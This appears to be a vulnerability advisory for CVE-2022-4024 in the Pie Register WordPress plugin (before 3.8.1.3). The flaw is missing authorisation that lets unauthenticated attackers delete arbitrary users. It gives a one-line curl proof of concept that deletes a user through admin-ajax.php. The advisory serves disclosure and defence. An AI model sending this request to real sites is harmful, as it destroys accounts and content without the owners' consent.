Pie Register < 3.8.1.3 – Unauthenticated Arbitrary User Deletion | CVE 2022-4024

Description

The plugin does not have authorisation and CSRF when deleting users via an init action handler, allowing unauthenticated attackers to delete arbitrary users (along with their posts)

Proof of Concept

Invoke the following curl command to delete the user (user id 2)

curl https://example.com/wp-admin/admin-ajax.php --data 'vdeleteit=1&vusers[]=2'

Affects Plugins

pie-register

Fixed in 3.8.1.3

References

CVE

CVE-2022-4024

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CWE-862

CVSS

8.2 (high)

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

cyllective

Verified

Yes

WPVDB ID

a087fb45-6f6c-40ac-b48b-2cbceda86cbe

Timeline

Publicly Published

2022-11-28 (about 1 years ago)

Added

2022-11-28 (about 1 years ago)

Last Updated

2022-11-28 (about 1 years ago)

Other

Published

Title

Published

2019-06-15

Title

Real Estate Manager < 7.0 - Subscriber+ Settings Update

Published

2022-06-02

Title

Browser and Operating System Finder <= 1.2 - Unauthenticated Settings Reset

Published

2023-11-07

Title

Dragfy Addons for Elementor <= 1.0.2 - Missing Authorization via save_settings

Published

2024-04-12

Title

Pardot < 2.1.1 - Missing Authorization

Published

2023-01-10

Title

Royal Elementor Addons < 1.3.60 - Subscriber+ Template Condition Update